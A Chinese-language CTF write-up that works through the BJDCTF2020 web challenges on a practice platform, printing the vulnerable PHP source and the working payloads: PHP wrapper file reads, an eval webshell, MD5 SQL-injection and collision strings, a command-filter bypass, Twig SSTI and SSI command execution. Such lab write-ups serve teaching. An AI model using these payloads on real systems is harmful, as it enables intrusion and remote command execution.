Life has its own fate, and meeting may not be accidental.

0%

BJDCTF2020-web复现

BJDCTF2020
未完待续

ZJCTF,就这?

看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。

BUU上和源题好像有点差别。

进题放出源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}

include($file); //next.php

}
else{
highlight_file(__FILE__);
}
?>

file_get_contents($text,’r’)===”I have a dream”),
读取$text文件内容为I have a dream,想到data://伪协议。
看到官方wp还可以远程读取,对不起我是弟弟。

?text=data://text/plain,I%20have%20a%20dream

绕过第一个。

第二个让我们读取next.php ,可以利用filter。

?text=data://text/plain,I%20have%20a%20dream&file=php://filter/convert.base64-encode/resource=next.php

next.php

![解码出来的图片](1jpg %}

出题人的指引下,看了大佬的一篇文章。

next.php?\S*=${phpinfo()}
可以用,poc直接打。

next.php?\S*=${eval($_POST[cmd])}

连上木马后找到flag

easy_md5

我注入真菜

F12 看到有个

hint: select * from 'admin' where password=md5($pass,true)
得到sql语句.

Leet More 2010 Jailbreak writeup

总结: ffifdyop
这个字符串其哈希值:276f722736c95d99e921722cf9ed621c

字符串: ‘or’6

select * from admin where password=’’or’6
相当于select * from admin where password=’’or 1 实现注入.

然后跳转到新页面

审查页面元素:

1
2
3
4
5
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.

赵总又来找女朋友了!

get传A和b都是0e开头就行

payload:

?a=s155964671a&b=2120624
跳转到第三个页面.

1
2
3
4
5
6
7
8
9
<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}

要求我们post三个,但是他和上面不同,上面那个是两个等号,下面是三个等号,全等.可以考虑MD5生日攻击,还有MD5不支持数组,如果你param1和param2是数组传入,则MD5等号两边都是false也成立.

1
param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

或者直接数组传入就行param1[]=1,param2[]=2

参考网址

postman的话,我这边要改成raw格式才能撞进去,我去!!注意格式问题.

感谢晓黑

中出一个安洵杯 easy_web

被晓黑老哥安利了下easy_web,题型差不多正好做一下。

查看元素,发现题面就img,发现下面有一行md5 is funny ~,然后就下意识得看了下url:

/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
猜测img后面跟的是文件名,cmd应该是后期要执行的命令,然后我去试了下hex,解不开,然后base64也没解开,然后有点困就去睡觉了。。。。
早上醒过来,越想越不应该,不可能解不开,然后果然忘记补等号了原先是27位,不能能被整除,奶奶的。两层base64接开后,再用hex,得到555.png

1
2
3
TXpVek5UTTFNbVUzTURabE5qYz0->MzUzNTM1MmU3MDZlNjc=->3535352e706e67->555.png
反过来
index.php->696e6465782e706870->Njk2ZTY0NjU3ODJlNzA2ODcw->TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

http://16e5095c-d64f-49f0-a553-ef6564d69eea.node3.buuoj.cn/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd=

然后就会得到一传base64加密得index.php



base64解一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>

前半部分就是刚才的东西,后半部分是讲cmd得,果然是命令执行。a和b套刚刚的就行了,正则我看的头疼。。试了个dir和dir%20/发现flag在目录下,然后试了个ca\t发现可以用。

![dir](4jpg %}

![ca\t](5jpg %}

Mark loves cat

打开页面发现有用的信息都没得,然后fuzz一下用dirb

dirb http://31d76b5b-06b8-4911-9a08-b2d9d71eb368.node3.buuoj.cn/

![dirb](6jpg %}

发现.git源码泄露。

python GitHack.py http://31d76b5b-06b8-4911-9a08-b2d9d71eb368.node3.buuoj.cn/.git

![.git](7jpg %}

得到flag.php和index.php.

flag.php

1
2
<?php
$flag = file_get_contents('/flag');

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}

echo "the flag is: ".$flag;

可以看到里面用到可变变量,第二个条件最简单,只要保证post的flag和get的flag变量没被用过就行。输出的$yds,所以我们只要get请求yds=flag就行了,就会把$x=yds,$y=flag==>$yds=$flag,然后$yds就会是flag。

![brup](8jpg %}

PHP可变变量

The_Mystery_of_ip

![审查元素](9jpg %}

点进去发现三个,index.php、hint.php、flag.php。一开始没发现hint.php的提示,我这眼神,不过我看到flag.php的ip,然后试了下X-Forwarded-For、client-ip。发现ip可控,想到之前打的一题XFF注入的题,然后发现没有。看Y1ng表哥博客发现ssti注入,我傻了,第一次遇到这样也可以ssti注入的。学到了!!!

![brup](10jpg %}

pyload:

1
X-Forwarded-For: 127.0.0.1{{system('cat /flag')}}

页面元素和上一题差不多,flag.php变成输入的,想到上一题是ssti注入,突然感觉这题可能也是注入题,然后输入了49,果然!

![网上看到的](12jpg %}

关于ssti注入(二向箔安全学院)

直接拿这篇的payloadl来打:

1
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

发现可以直接打。

1
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

![brup](13jpg %}

服务器会将我们输入的注入编码后变成cookie,我们直接把注入放在cookie里就行了!

EasySearch

打了半天没思路,看了别的表哥的wp,发现原先题目有提示vim泄露的,Buu复现好像没提示,index.php.swp拿到源码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";

}else
{
***
}
***
?>

可以看到要求username不为空,并且我们输入的密码MD5,前六位要与6d0bc1相等。

1
2
3
4
5
6
7
8
9
10
11
12
13
import hashlib
list='0123456789'
for a in list:
for b in list:
for c in list:
for d in list:
for e in list:
for f in list:
for g in list:
str1 = (a+b+c+d+e+f+g)
value = hashlib.md5(str1.encode()).hexdigest()
if value[0:6] == '6d0bc1':
print(str1)

跑出 三个数字2020666、2305004、9162671。随便用一个!穿后返回了个地址

![brup](14jpg %}

访问一下,发现刚刚username被用了

![shtml](15jpg %}

省赛的时候考过ssi解析漏洞,上ssi解析漏洞:

<!--#exec cmd="dir /" -->

访问了根目录和当前目录发现没有flag文件,然后访问了下上级目录

发现flag文件,直接打,得到flag。

<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2" -->